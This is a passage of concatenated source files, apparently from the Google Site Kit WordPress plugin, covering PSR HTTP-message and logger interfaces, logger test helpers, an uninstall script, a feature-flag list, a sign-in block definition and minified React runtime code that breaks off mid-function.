string if none present. */ public function getReasonPhrase() : string; } <?php namespace Google\Site_Kit_Dependencies\Psr\Http\Message; /** * HTTP messages consist of requests from a client to a server and responses * from a server to a client. This interface defines the methods common to * each. * * Messages are considered immutable; all methods that might change state MUST * be implemented such that they retain the internal state of the current * message and return an instance that contains the changed state. * * @link http://www.ietf.org/rfc/rfc7230.txt * @link http://www.ietf.org/rfc/rfc7231.txt */ interface MessageInterface { /** * Retrieves the HTTP protocol version as a string. * * The string MUST contain only the HTTP version number (e.g., "1.1", "1.0"). * * @return string HTTP protocol version. */ public function getProtocolVersion() : string; /** * Return an instance with the specified HTTP protocol version. * * The version string MUST contain only the HTTP version number (e.g., * "1.1", "1.0"). * * This method MUST be implemented in such a way as to retain the * immutability of the message, and MUST return an instance that has the * new protocol version. * * @param string $version HTTP protocol version * @return static */ public function withProtocolVersion(string $version) : \Google\Site_Kit_Dependencies\Psr\Http\Message\MessageInterface; /** * Retrieves all message header values. * * The keys represent the header name as it will be sent over the wire, and * each value is an array of strings associated with the header. * * // Represent the headers as a string * foreach ($message->getHeaders() as $name => $values) { * echo $name . ": " . implode(", ", $values); * } * * // Emit headers iteratively: * foreach ($message->getHeaders() as $name => $values) { * foreach ($values as $value) { * header(sprintf('%s: %s', $name, $value), false); * } * } * * While header names are not case-sensitive, getHeaders() will preserve the * exact case in which headers were originally specified. * * @return string[][] Returns an associative array of the message's headers. Each * key MUST be a header name, and each value MUST be an array of strings * for that header. */ public function getHeaders() : array; /** * Checks if a header exists by the given case-insensitive name. * * @param string $name Case-insensitive header field name. * @return bool Returns true if any header names match the given header * name using a case-insensitive string comparison. Returns false if * no matching header name is found in the message. */ public function hasHeader(string $name) : bool; /** * Retrieves a message header value by the given case-insensitive name. * * This method returns an array of all the header values of the given * case-insensitive header name. * * If the header does not appear in the message, this method MUST return an * empty array. * * @param string $name Case-insensitive header field name. * @return string[] An array of string values as provided for the given * header. If the header does not appear in the message, this method MUST * return an empty array. */ public function getHeader(string $name) : array; /** * Retrieves a comma-separated string of the values for a single header. * * This method returns all of the header values of the given * case-insensitive header name as a string concatenated together using * a comma. * * NOTE: Not all header values may be appropriately represented using * comma concatenation. For such headers, use getHeader() instead * and supply your own delimiter when concatenating. * * If the header does not appear in the message, this method MUST return * an empty string. * * @param string $name Case-insensitive header field name. * @return string A string of values as provided for the given header * concatenated together using a comma. If the header does not appear in * the message, this method MUST return an empty string. */ public function getHeaderLine(string $name) : string; /** * Return an instance with the provided value replacing the specified header. * * While header names are case-insensitive, the casing of the header will * be preserved by this function, and returned from getHeaders(). * * This method MUST be implemented in such a way as to retain the * immutability of the message, and MUST return an instance that has the * new and/or updated header and value. * * @param string $name Case-insensitive header field name. * @param string|string[] $value Header value(s). * @return static * @throws \InvalidArgumentException for invalid header names or values. */ public function withHeader(string $name, $value) : \Google\Site_Kit_Dependencies\Psr\Http\Message\MessageInterface; /** * Return an instance with the specified header appended with the given value. * * Existing values for the specified header will be maintained. The new * value(s) will be appended to the existing list. If the header did not * exist previously, it will be added. * * This method MUST be implemented in such a way as to retain the * immutability of the message, and MUST return an instance that has the * new header and/or value. * * @param string $name Case-insensitive header field name to add. * @param string|string[] $value Header value(s). * @return static * @throws \InvalidArgumentException for invalid header names or values. */ public function withAddedHeader(string $name, $value) : \Google\Site_Kit_Dependencies\Psr\Http\Message\MessageInterface; /** * Return an instance without the specified header. * * Header resolution MUST be done without case-sensitivity. * * This method MUST be implemented in such a way as to retain the * immutability of the message, and MUST return an instance that removes * the named header. * * @param string $name Case-insensitive header field name to remove. * @return static */ public function withoutHeader(string $name) : \Google\Site_Kit_Dependencies\Psr\Http\Message\MessageInterface; /** * Gets the body of the message. * * @return StreamInterface Returns the body as a stream. */ public function getBody() : \Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface; /** * Return an instance with the specified message body. * * The body MUST be a StreamInterface object. * * This method MUST be implemented in such a way as to retain the * immutability of the message, and MUST return a new instance that has the * new body stream. * * @param StreamInterface $body Body. * @return static * @throws \InvalidArgumentException When the body is not valid. */ public function withBody(\Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface $body) : \Google\Site_Kit_Dependencies\Psr\Http\Message\MessageInterface; } <?php namespace Google\Site_Kit_Dependencies\Psr\Log; /** * Describes log levels. */ class LogLevel { const EMERGENCY = 'emergency'; const ALERT = 'alert'; const CRITICAL = 'critical'; const ERROR = 'error'; const WARNING = 'warning'; const NOTICE = 'notice'; const INFO = 'info'; const DEBUG = 'debug'; } <?php namespace Google\Site_Kit_Dependencies\Psr\Log; /** * This is a simple Logger trait that classes unable to extend AbstractLogger * (because they extend another class, etc) can include. * * It simply delegates all log-level-specific methods to the `log` method to * reduce boilerplate code that a simple Logger that does the same thing with * messages regardless of the error level has to implement. */ trait LoggerTrait { /** * System is unusable. * * @param string $message * @param array $context * * @return void */ public function emergency($message, array $context = array()) { $this->log(\Google\Site_Kit_Dependencies\Psr\Log\LogLevel::EMERGENCY, $message, $context); } /** * Action must be taken immediately. * * Example: Entire website down, database unavailable, etc. This should * trigger the SMS alerts and wake you up. * * @param string $message * @param array $context * * @return void */ public function alert($message, array $context = array()) { $this->log(\Google\Site_Kit_Dependencies\Psr\Log\LogLevel::ALERT, $message, $context); } /** * Critical conditions. * * Example: Application component unavailable, unexpected exception. * * @param string $message * @param array $context * * @return void */ public function critical($message, array $context = array()) { $this->log(\Google\Site_Kit_Dependencies\Psr\Log\LogLevel::CRITICAL, $message, $context); } /** * Runtime errors that do not require immediate action but should typically * be logged and monitored. * * @param string $message * @param array $context * * @return void */ public function error($message, array $context = array()) { $this->log(\Google\Site_Kit_Dependencies\Psr\Log\LogLevel::ERROR, $message, $context); } /** * Exceptional occurrences that are not errors. * * Example: Use of deprecated APIs, poor use of an API, undesirable things * that are not necessarily wrong. * * @param string $message * @param array $context * * @return void */ public function warning($message, array $context = array()) { $this->log(\Google\Site_Kit_Dependencies\Psr\Log\LogLevel::WARNING, $message, $context); } /** * Normal but significant events. * * @param string $message * @param array $context * * @return void */ public function notice($message, array $context = array()) { $this->log(\Google\Site_Kit_Dependencies\Psr\Log\LogLevel::NOTICE, $message, $context); } /** * Interesting events. * * Example: User logs in, SQL logs. * * @param string $message * @param array $context * * @return void */ public function info($message, array $context = array()) { $this->log(\Google\Site_Kit_Dependencies\Psr\Log\LogLevel::INFO, $message, $context); } /** * Detailed debug information. * * @param string $message * @param array $context * * @return void */ public function debug($message, array $context = array()) { $this->log(\Google\Site_Kit_Dependencies\Psr\Log\LogLevel::DEBUG, $message, $context); } /** * Logs with an arbitrary level. * * @param mixed $level * @param string $message * @param array $context * * @return void * * @throws \Psr\Log\InvalidArgumentException */ public abstract function log($level, $message, array $context = array()); } <?php namespace Google\Site_Kit_Dependencies\Psr\Log; /** * Describes a logger instance. * * The message MUST be a string or object implementing __toString(). * * The message MAY contain placeholders in the form: {foo} where foo * will be replaced by the context data in key "foo". * * The context array can contain arbitrary data. The only assumption that * can be made by implementors is that if an Exception instance is given * to produce a stack trace, it MUST be in a key named "exception". * * See https://github.com/php-fig/fig-standards/blob/master/accepted/PSR-3-logger-interface.md * for the full interface specification. */ interface LoggerInterface { /** * System is unusable. * * @param string $message * @param mixed[] $context * * @return void */ public function emergency($message, array $context = array()); /** * Action must be taken immediately. * * Example: Entire website down, database unavailable, etc. This should * trigger the SMS alerts and wake you up. * * @param string $message * @param mixed[] $context * * @return void */ public function alert($message, array $context = array()); /** * Critical conditions. * * Example: Application component unavailable, unexpected exception. * * @param string $message * @param mixed[] $context * * @return void */ public function critical($message, array $context = array()); /** * Runtime errors that do not require immediate action but should typically * be logged and monitored. * * @param string $message * @param mixed[] $context * * @return void */ public function error($message, array $context = array()); /** * Exceptional occurrences that are not errors. * * Example: Use of deprecated APIs, poor use of an API, undesirable things * that are not necessarily wrong. * * @param string $message * @param mixed[] $context * * @return void */ public function warning($message, array $context = array()); /** * Normal but significant events. * * @param string $message * @param mixed[] $context * * @return void */ public function notice($message, array $context = array()); /** * Interesting events. * * Example: User logs in, SQL logs. * * @param string $message * @param mixed[] $context * * @return void */ public function info($message, array $context = array()); /** * Detailed debug information. * * @param string $message * @param mixed[] $context * * @return void */ public function debug($message, array $context = array()); /** * Logs with an arbitrary level. * * @param mixed $level * @param string $message * @param mixed[] $context * * @return void * * @throws \Psr\Log\InvalidArgumentException */ public function log($level, $message, array $context = array()); } <?php namespace Google\Site_Kit_Dependencies\Psr\Log; /** * Basic Implementation of LoggerAwareInterface. */ trait LoggerAwareTrait { /** * The logger instance. * * @var LoggerInterface|null */ protected $logger; /** * Sets a logger. * * @param LoggerInterface $logger */ public function setLogger(\Google\Site_Kit_Dependencies\Psr\Log\LoggerInterface $logger) { $this->logger = $logger; } } <?php namespace Google\Site_Kit_Dependencies\Psr\Log; /** * This Logger can be used to avoid conditional log calls. * * Logging should always be optional, and if no logger is provided to your * library creating a NullLogger instance to have something to throw logs at * is a good way to avoid littering your code with `if ($this->logger) { }` * blocks. */ class NullLogger extends \Google\Site_Kit_Dependencies\Psr\Log\AbstractLogger { /** * Logs with an arbitrary level. * * @param mixed $level * @param string $message * @param array $context * * @return void * * @throws \Psr\Log\InvalidArgumentException */ public function log($level, $message, array $context = array()) { // noop } } <?php namespace Google\Site_Kit_Dependencies\Psr\Log\Test; use Google\Site_Kit_Dependencies\Psr\Log\AbstractLogger; /** * Used for testing purposes. * * It records all records and gives you access to them for verification. * * @method bool hasEmergency($record) * @method bool hasAlert($record) * @method bool hasCritical($record) * @method bool hasError($record) * @method bool hasWarning($record) * @method bool hasNotice($record) * @method bool hasInfo($record) * @method bool hasDebug($record) * * @method bool hasEmergencyRecords() * @method bool hasAlertRecords() * @method bool hasCriticalRecords() * @method bool hasErrorRecords() * @method bool hasWarningRecords() * @method bool hasNoticeRecords() * @method bool hasInfoRecords() * @method bool hasDebugRecords() * * @method bool hasEmergencyThatContains($message) * @method bool hasAlertThatContains($message) * @method bool hasCriticalThatContains($message) * @method bool hasErrorThatContains($message) * @method bool hasWarningThatContains($message) * @method bool hasNoticeThatContains($message) * @method bool hasInfoThatContains($message) * @method bool hasDebugThatContains($message) * * @method bool hasEmergencyThatMatches($message) * @method bool hasAlertThatMatches($message) * @method bool hasCriticalThatMatches($message) * @method bool hasErrorThatMatches($message) * @method bool hasWarningThatMatches($message) * @method bool hasNoticeThatMatches($message) * @method bool hasInfoThatMatches($message) * @method bool hasDebugThatMatches($message) * * @method bool hasEmergencyThatPasses($message) * @method bool hasAlertThatPasses($message) * @method bool hasCriticalThatPasses($message) * @method bool hasErrorThatPasses($message) * @method bool hasWarningThatPasses($message) * @method bool hasNoticeThatPasses($message) * @method bool hasInfoThatPasses($message) * @method bool hasDebugThatPasses($message) */ class TestLogger extends \Google\Site_Kit_Dependencies\Psr\Log\AbstractLogger { /** * @var array */ public $records = []; public $recordsByLevel = []; /** * @inheritdoc */ public function log($level, $message, array $context = []) { $record = ['level' => $level, 'message' => $message, 'context' => $context]; $this->recordsByLevel[$record['level']][] = $record; $this->records[] = $record; } public function hasRecords($level) { return isset($this->recordsByLevel[$level]); } public function hasRecord($record, $level) { if (\is_string($record)) { $record = ['message' => $record]; } return $this->hasRecordThatPasses(function ($rec) use($record) { if ($rec['message'] !== $record['message']) { return \false; } if (isset($record['context']) && $rec['context'] !== $record['context']) { return \false; } return \true; }, $level); } public function hasRecordThatContains($message, $level) { return $this->hasRecordThatPasses(function ($rec) use($message) { return \strpos($rec['message'], $message) !== \false; }, $level); } public function hasRecordThatMatches($regex, $level) { return $this->hasRecordThatPasses(function ($rec) use($regex) { return \preg_match($regex, $rec['message']) > 0; }, $level); } public function hasRecordThatPasses(callable $predicate, $level) { if (!isset($this->recordsByLevel[$level])) { return \false; } foreach ($this->recordsByLevel[$level] as $i => $rec) { if (\call_user_func($predicate, $rec, $i)) { return \true; } } return \false; } public function __call($method, $args) { if (\preg_match('/(.*)(Debug|Info|Notice|Warning|Error|Critical|Alert|Emergency)(.*)/', $method, $matches) > 0) { $genericMethod = $matches[1] . ('Records' !== $matches[3] ? 'Record' : '') . $matches[3]; $level = \strtolower($matches[2]); if (\method_exists($this, $genericMethod)) { $args[] = $level; return \call_user_func_array([$this, $genericMethod], $args); } } throw new \BadMethodCallException('Call to undefined method ' . \get_class($this) . '::' . $method . '()'); } public function reset() { $this->records = []; $this->recordsByLevel = []; } } <?php namespace Google\Site_Kit_Dependencies\Psr\Log\Test; /** * This class is internal and does not follow the BC promise. * * Do NOT use this class in any way. * * @internal */ class DummyTest { public function __toString() { return 'DummyTest'; } } <?php namespace Google\Site_Kit_Dependencies\Psr\Log\Test; use Google\Site_Kit_Dependencies\Psr\Log\LoggerInterface; use Google\Site_Kit_Dependencies\Psr\Log\LogLevel; use Google\Site_Kit_Dependencies\PHPUnit\Framework\TestCase; /** * Provides a base test class for ensuring compliance with the LoggerInterface. * * Implementors can extend the class and implement abstract methods to run this * as part of their test suite. */ abstract class LoggerInterfaceTest extends \Google\Site_Kit_Dependencies\PHPUnit\Framework\TestCase { /** * @return LoggerInterface */ public abstract function getLogger(); /** * This must return the log messages in order. * * The simple formatting of the messages is: "<LOG LEVEL> <MESSAGE>". * * Example ->error('Foo') would yield "error Foo". * * @return string[] */ public abstract function getLogs(); public function testImplements() { $this->assertInstanceOf('Google\\Site_Kit_Dependencies\\Psr\\Log\\LoggerInterface', $this->getLogger()); } /** * @dataProvider provideLevelsAndMessages */ public function testLogsAtAllLevels($level, $message) { $logger = $this->getLogger(); $logger->{$level}($message, array('user' => 'Bob')); $logger->log($level, $message, array('user' => 'Bob')); $expected = array($level . ' message of level ' . $level . ' with context: Bob', $level . ' message of level ' . $level . ' with context: Bob'); $this->assertEquals($expected, $this->getLogs()); } public function provideLevelsAndMessages() { return array(\Google\Site_Kit_Dependencies\Psr\Log\LogLevel::EMERGENCY => array(\Google\Site_Kit_Dependencies\Psr\Log\LogLevel::EMERGENCY, 'message of level emergency with context: {user}'), \Google\Site_Kit_Dependencies\Psr\Log\LogLevel::ALERT => array(\Google\Site_Kit_Dependencies\Psr\Log\LogLevel::ALERT, 'message of level alert with context: {user}'), \Google\Site_Kit_Dependencies\Psr\Log\LogLevel::CRITICAL => array(\Google\Site_Kit_Dependencies\Psr\Log\LogLevel::CRITICAL, 'message of level critical with context: {user}'), \Google\Site_Kit_Dependencies\Psr\Log\LogLevel::ERROR => array(\Google\Site_Kit_Dependencies\Psr\Log\LogLevel::ERROR, 'message of level error with context: {user}'), \Google\Site_Kit_Dependencies\Psr\Log\LogLevel::WARNING => array(\Google\Site_Kit_Dependencies\Psr\Log\LogLevel::WARNING, 'message of level warning with context: {user}'), \Google\Site_Kit_Dependencies\Psr\Log\LogLevel::NOTICE => array(\Google\Site_Kit_Dependencies\Psr\Log\LogLevel::NOTICE, 'message of level notice with context: {user}'), \Google\Site_Kit_Dependencies\Psr\Log\LogLevel::INFO => array(\Google\Site_Kit_Dependencies\Psr\Log\LogLevel::INFO, 'message of level info with context: {user}'), \Google\Site_Kit_Dependencies\Psr\Log\LogLevel::DEBUG => array(\Google\Site_Kit_Dependencies\Psr\Log\LogLevel::DEBUG, 'message of level debug with context: {user}')); } /** * @expectedException \Psr\Log\InvalidArgumentException */ public function testThrowsOnInvalidLevel() { $logger = $this->getLogger(); $logger->log('invalid level', 'Foo'); } public function testContextReplacement() { $logger = $this->getLogger(); $logger->info('{Message {nothing} {user} {foo.bar} a}', array('user' => 'Bob', 'foo.bar' => 'Bar')); $expected = array('info {Message {nothing} Bob Bar a}'); $this->assertEquals($expected, $this->getLogs()); } public function testObjectCastToString() { if (\method_exists($this, 'createPartialMock')) { $dummy = $this->createPartialMock('Google\\Site_Kit_Dependencies\\Psr\\Log\\Test\\DummyTest', array('__toString')); } else { $dummy = $this->getMock('Google\\Site_Kit_Dependencies\\Psr\\Log\\Test\\DummyTest', array('__toString')); } $dummy->expects($this->once())->method('__toString')->will($this->returnValue('DUMMY')); $this->getLogger()->warning($dummy); $expected = array('warning DUMMY'); $this->assertEquals($expected, $this->getLogs()); } public function testContextCanContainAnything() { $closed = \fopen('php://memory', 'r'); \fclose($closed); $context = array('bool' => \true, 'null' => null, 'string' => 'Foo', 'int' => 0, 'float' => 0.5, 'nested' => array('with object' => new \Google\Site_Kit_Dependencies\Psr\Log\Test\DummyTest()), 'object' => new \DateTime(), 'resource' => \fopen('php://memory', 'r'), 'closed' => $closed); $this->getLogger()->warning('Crazy context data', $context); $expected = array('warning Crazy context data'); $this->assertEquals($expected, $this->getLogs()); } public function testContextExceptionKeyCanBeExceptionOrOtherValues() { $logger = $this->getLogger(); $logger->warning('Random message', array('exception' => 'oops')); $logger->critical('Uncaught Exception!', array('exception' => new \LogicException('Fail'))); $expected = array('warning Random message', 'critical Uncaught Exception!'); $this->assertEquals($expected, $this->getLogs()); } } <?php namespace Google\Site_Kit_Dependencies\Psr\Log; class InvalidArgumentException extends \InvalidArgumentException { } <?php namespace Google\Site_Kit_Dependencies\Psr\Log; /** * This is a simple Logger implementation that other Loggers can inherit from. * * It simply delegates all log-level-specific methods to the `log` method to * reduce boilerplate code that a simple Logger that does the same thing with * messages regardless of the error level has to implement. */ abstract class AbstractLogger implements \Google\Site_Kit_Dependencies\Psr\Log\LoggerInterface { /** * System is unusable. * * @param string $message * @param mixed[] $context * * @return void */ public function emergency($message, array $context = array()) { $this->log(\Google\Site_Kit_Dependencies\Psr\Log\LogLevel::EMERGENCY, $message, $context); } /** * Action must be taken immediately. * * Example: Entire website down, database unavailable, etc. This should * trigger the SMS alerts and wake you up. * * @param string $message * @param mixed[] $context * * @return void */ public function alert($message, array $context = array()) { $this->log(\Google\Site_Kit_Dependencies\Psr\Log\LogLevel::ALERT, $message, $context); } /** * Critical conditions. * * Example: Application component unavailable, unexpected exception. * * @param string $message * @param mixed[] $context * * @return void */ public function critical($message, array $context = array()) { $this->log(\Google\Site_Kit_Dependencies\Psr\Log\LogLevel::CRITICAL, $message, $context); } /** * Runtime errors that do not require immediate action but should typically * be logged and monitored. * * @param string $message * @param mixed[] $context * * @return void */ public function error($message, array $context = array()) { $this->log(\Google\Site_Kit_Dependencies\Psr\Log\LogLevel::ERROR, $message, $context); } /** * Exceptional occurrences that are not errors. * * Example: Use of deprecated APIs, poor use of an API, undesirable things * that are not necessarily wrong. * * @param string $message * @param mixed[] $context * * @return void */ public function warning($message, array $context = array()) { $this->log(\Google\Site_Kit_Dependencies\Psr\Log\LogLevel::WARNING, $message, $context); } /** * Normal but significant events. * * @param string $message * @param mixed[] $context * * @return void */ public function notice($message, array $context = array()) { $this->log(\Google\Site_Kit_Dependencies\Psr\Log\LogLevel::NOTICE, $message, $context); } /** * Interesting events. * * Example: User logs in, SQL logs. * * @param string $message * @param mixed[] $context * * @return void */ public function info($message, array $context = array()) { $this->log(\Google\Site_Kit_Dependencies\Psr\Log\LogLevel::INFO, $message, $context); } /** * Detailed debug information. * * @param string $message * @param mixed[] $context * * @return void */ public function debug($message, array $context = array()) { $this->log(\Google\Site_Kit_Dependencies\Psr\Log\LogLevel::DEBUG, $message, $context); } } <?php namespace Google\Site_Kit_Dependencies\Psr\Log; /** * Describes a logger-aware instance. */ interface LoggerAwareInterface { /** * Sets a logger instance on the object. * * @param LoggerInterface $logger * * @return void */ public function setLogger(\Google\Site_Kit_Dependencies\Psr\Log\LoggerInterface $logger); } <?php namespace Google\Site_Kit_Dependencies\Psr\Http\Message; interface ResponseFactoryInterface { /** * Create a new response. * * @param int $code HTTP status code; defaults to 200 * @param string $reasonPhrase Reason phrase to associate with status code * in generated response; if none is provided implementations MAY use * the defaults as suggested in the HTTP specification. * * @return ResponseInterface */ public function createResponse(int $code = 200, string $reasonPhrase = '') : \Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface; } <?php namespace Google\Site_Kit_Dependencies\Psr\Http\Message; interface StreamFactoryInterface { /** * Create a new stream from a string. * * The stream SHOULD be created with a temporary resource. * * @param string $content String content with which to populate the stream. * * @return StreamInterface */ public function createStream(string $content = '') : \Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface; /** * Create a stream from an existing file. * * The file MUST be opened using the given mode, which may be any mode * supported by the `fopen` function. * * The `$filename` MAY be any string supported by `fopen()`. * * @param string $filename Filename or stream URI to use as basis of stream. * @param string $mode Mode with which to open the underlying filename/stream. * * @return StreamInterface * @throws \RuntimeException If the file cannot be opened. * @throws \InvalidArgumentException If the mode is invalid. */ public function createStreamFromFile(string $filename, string $mode = 'r') : \Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface; /** * Create a new stream from an existing resource. * * The stream MUST be readable and may be writable. * * @param resource $resource PHP resource to use as basis of stream. * * @return StreamInterface */ public function createStreamFromResource($resource) : \Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface; } <?php namespace Google\Site_Kit_Dependencies\Psr\Http\Message; interface ServerRequestFactoryInterface { /** * Create a new server request. * * Note that server-params are taken precisely as given - no parsing/processing * of the given values is performed, and, in particular, no attempt is made to * determine the HTTP method or URI, which must be provided explicitly. * * @param string $method The HTTP method associated with the request. * @param UriInterface|string $uri The URI associated with the request. If * the value is a string, the factory MUST create a UriInterface * instance based on it. * @param array $serverParams Array of SAPI parameters with which to seed * the generated request instance. * * @return ServerRequestInterface */ public function createServerRequest(string $method, $uri, array $serverParams = []) : \Google\Site_Kit_Dependencies\Psr\Http\Message\ServerRequestInterface; } <?php namespace Google\Site_Kit_Dependencies\Psr\Http\Message; interface UploadedFileFactoryInterface { /** * Create a new uploaded file. * * If a size is not provided it will be determined by checking the size of * the file. * * @see http://php.net/manual/features.file-upload.post-method.php * @see http://php.net/manual/features.file-upload.errors.php * * @param StreamInterface $stream Underlying stream representing the * uploaded file content. * @param int|null $size in bytes * @param int $error PHP file upload error * @param string|null $clientFilename Filename as provided by the client, if any. * @param string|null $clientMediaType Media type as provided by the client, if any. * * @return UploadedFileInterface * * @throws \InvalidArgumentException If the file resource is not readable. */ public function createUploadedFile(\Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface $stream, ?int $size = null, int $error = \UPLOAD_ERR_OK, ?string $clientFilename = null, ?string $clientMediaType = null) : \Google\Site_Kit_Dependencies\Psr\Http\Message\UploadedFileInterface; } <?php namespace Google\Site_Kit_Dependencies\Psr\Http\Message; interface UriFactoryInterface { /** * Create a new URI. * * @param string $uri * * @return UriInterface * * @throws \InvalidArgumentException If the given URI cannot be parsed. */ public function createUri(string $uri = '') : \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface; } <?php namespace Google\Site_Kit_Dependencies\Psr\Http\Message; interface RequestFactoryInterface { /** * Create a new request. * * @param string $method The HTTP method associated with the request. * @param UriInterface|string $uri The URI associated with the request. If * the value is a string, the factory MUST create a UriInterface * instance based on it. * * @return RequestInterface */ public function createRequest(string $method, $uri) : \Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; } <?php /** * Uninstallation script for the plugin. * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ // Prevent execution from directly accessing the file. if ( ! defined( 'WP_UNINSTALL_PLUGIN' ) ) { exit; } // Load plugin main file to bootstrap infrastructure and add hooks. require_once __DIR__ . '/google-site-kit.php'; // Fire action to trigger uninstallation logic. do_action( 'googlesitekit_uninstallation' ); <?php /** * @package Google\Site_Kit * @copyright 2026 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ return array( 'features' => array( 'adsPax','googleTagGateway','gtagUserData','privacySandboxModule','proactiveUserEngagement','setupFlowRefresh' ), ); .googlesitekit-blocks-sign-in-with-google{max-width:180px;min-width:120px} { "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 2, "name": "google-site-kit/sign-in-with-google", "version": "1.170.0", "title": "Sign in with Google", "category": "widgets", "icon": "google", "description": "Allow users to sign in to your site using their Google Account.", "textdomain": "google-site-kit", "attributes": { "shape": { "type": "string", "enum": [ "", "rectangular", "pill" ] }, "text": { "type": "string", "enum": [ "", "continue_with", "signin", "signin_with", "signup_with" ] }, "theme": { "type": "string", "enum": [ "", "outline", "filled_blue", "filled_black" ] }, "buttonClassName": { "type": "string" } } } (()=>{"use strict";var e={192:(e,t,n)=>{var r=n(696),o=60103;if("function"==typeof Symbol&&Symbol.for){var A=Symbol.for;o=A("react.element"),A("react.fragment")}var i=r.__SECRET_INTERNALS_DO_NOT_USE_OR_YOU_WILL_BE_FIRED.ReactCurrentOwner,l=Object.prototype.hasOwnProperty,a={key:!0,ref:!0,__self:!0,__source:!0};function u(e,t,n){var r,A={},u=null,s=null;for(r in void 0!==n&&(u=""+n),void 0!==t.key&&(u=""+t.key),void 0!==t.ref&&(s=t.ref),t)l.call(t,r)&&!a.hasOwnProperty(r)&&(A[r]=t[r]);if(e&&e.defaultProps)for(r in t=e.defaultProps)void 0===A[r]&&(A[r]=t[r]);return{$$typeof:o,type:e,key:u,ref:s,props:A,_owner:i.current}}t.jsx=u,t.jsxs=u},403:(e,t,n)=>{var r=n(664),o="function"==typeof Symbol&&Symbol.for,A=o?Symbol.for("react.element"):60103,i=o?Symbol.for("react.portal"):60106,l=o?Symbol.for("react.fragment"):60107,a=o?Symbol.for("react.strict_mode"):60108,u=o?Symbol.for("react.profiler"):60114,s=o?Symbol.for("react.provider"):60109,c=o?Symbol.for("react.context"):60110,f=o?Symbol.for("react.forward_ref"):60112,g=o?Symbol.for("react.suspense"):60113,p=o?Symbol.for("react.memo"):60115,v=o?Symbol.for("react.lazy"):60116,h="function"==typeof Symbol&&Symbol.iterator;function C(e){for(var t="https://reactjs.org/docs/error-decoder.html?invariant="+e,n=1;n<arguments.length;n++)t+="&args[]="+encodeURIComponent(arguments[n]);return"Minified React error #"+e+"; visit "+t+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var y={isMounted:function(){return!1},enqueueForceUpdate:function(){},enqueueReplaceState:function(){},enqueueSetState:function(){}},w={};function B(e,t,n){this.props=e,this.context=t,this.refs=w,this.updater=n||y}function m(){}function b(e,t,n){this.props=e,this.context=t,this.refs=w,this.updater=n||y}B.prototype.isReactComponent={},B.prototype.setState=function(e,t){if("object"!=typeof e&&"function"!=typeof e&&null!=e)throw Error(C(85));this.updater.enqueueSetState(this,e,t,"setState")},B.prototype.forceUpdate=function(e){this.updater.enqueueForceUpdate(this,e,"forceUpdate")},m.prototype=B.prototype;var E=b.prototype=new m;E.constructor=b,r(E,B.prototype),E.isPureReactComponent=!0;var d={current:null},R=Object.prototype.hasOwnProperty,Y={key:!0,ref:!0,__self:!0,__source:!0};function j(e,t,n){var r,o={},i=null,l=null;if(null!=t)for(r in void 0!==t.ref&&(l=t.ref),void 0!==t.key&&(i=""+t.key),t)R.call(t,r)&&!Y.hasOwnProperty(r)&&(o[r]=t[r]);var a=arguments.length-2;if(1===a)o.children=n;else if(1<a){for(var u=Array(a),s=0;s<a;s++)u[s]=arguments[s+2];o.children=u}if(e&&e.defaultProps)for(r in a=e.defaultProps)void 0===o[r]&&(o[r]=a[r]);return{$$typeof:A,type:e,key:i,ref:l,props:o,_owner:d.current}}function G(e){return"object"==typeof e&&null!==e&&e.$$typeof===A}var I=/\/+/g,P=[];function F(e,t,n,r){if(P.length){var o=P.pop();return o.result=e,o.keyPrefix=t,o.func=n,o.context=r,o.count=0,o}return{result:e,keyPrefix:t,func:n,context:r,count:0}}function S(e){e.result=null,e.keyPrefix=null,e.func=null,e.context=null,e.count=0,10>P.length&&P.push(e)}function x(e,t,n,r){var o=typeof e;"undefined"!==o&&"boolean"!==o||(e=null);var l=!1;if(null===e)l=!0;else switch(o){case"string":case"number":l=!0;break;case"object":switch(e.$$typeof){case A:case i:l=!0}}if(l)return n(r,e,""===t?"."+k(e,0):t),1;if(l=0,t=""===t?".":t+":",Array.isArray(e))for(var a=0;a<e.length;a++){var u=t+k(o=e[a],a);l+=x(o,u,n,r)}else if(null===e||"object"!=typeof e?u=null:u="function"==typeof(u=h&&e[h]||e["@@iterator"])?u:null,"function"==typeof u)for(e=u.call(e),a=0;!(o=e.next()).done;)l+=x(o=o.value,u=t+k(o,a++),n,r);else if("object"===o)throw n=""+e,Error(C(31,"[object Object]"===n?"object with keys {"+Object.keys(e).join(", ")+"}":n,""));return l}function N(e,t,n){return null==e?0:x(e,"",t,n)}function k(e,t){return"object"==typeof e&&null!==e&&null!=e.key?function(e){var t={"=":"=0",":":"=2"};return"$"+(""+e).replace(/[=:]/g,function(e){return t[e]})}(e.key):t.toString(36)}function W(e,t){e.func.call(e.context,t,e.count++)}function L(e,t,n){var r=e.result,o=e.keyPrefix;e=e.func.call(e.context,t,e.count++),Array.isArray(e)?D(e,r,n,function(e){return e}):null!=e&&(G(e)&&(e=function(e,t){return{$$typeof:A,type:e.type,key:t,ref:e.ref,props:e.props,_owner:e._owner}}(e,o+(!e.key||t&&t.key===e.key?"":(""+e.key).replace(I,"$&/")+"/")+n)),r.push(e))}function D(e,t,n,r,o){var A="";null!=n&&(A=(""+n).replace(I,"$&/")+"/"),N(e,L,t=F(t,A,r,o)),S(t)}var V={current:null};function Z(){var e=V.current;if(null===e)throw Error(C(321));return e}var Q={ReactCurrentDispatcher:V,ReactCurrentBatchConfig:{suspense:null},ReactCurrentOwner:d,IsSomeRendererActing:{current:!1},assign:r};t.Children={map:function(e,t,n){if(null==e)return e;var r=[];return D(e,r,null,t,n),r},forEach:function(e,t,n){if(null==e)return e;N(e,W,t=F(null,null,t,n)),S(t)},count:function(e){return N(e,function(){return null},null)},toArray:function(e){var t=[];return D(e,t,null,function(e){return e}),t},only:function(e){if(!G(e))throw Error(C(143));return 